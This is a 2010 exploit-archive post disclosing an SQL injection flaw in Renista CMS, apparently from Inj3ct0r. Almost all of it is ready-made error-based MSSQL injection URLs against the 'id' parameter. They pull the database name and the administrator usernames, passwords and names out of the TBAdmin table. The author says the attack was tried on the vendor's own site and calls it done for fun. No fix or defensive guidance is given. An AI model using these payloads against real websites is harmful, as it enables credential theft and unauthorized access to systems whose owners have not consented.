Home / os / win7

Renista CMS SQL Injection Vulnerability

Posted on 20 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Renista CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
Renista CMS SQL Injection Vulnerability
=======================================


Test on CMS Owner site :http://www.rayaco.com  
                     
# db name :
http://server/rtl/Default.aspx?ln=Fa&amp;id=3' and 1=convert(int,db_name())--
 
# cont user :
http://server/rtl/Default.aspx?ln=Fa&amp;id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--
 
# username :
http://server/rtl/Default.aspx?ln=Fa&amp;id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
 
# password :
http://server/rtl/Default.aspx?ln=Fa&amp;id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
# name :
http://server/rtl/Default.aspx?ln=Fa&amp;id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
========================
I tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .
 
Special thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP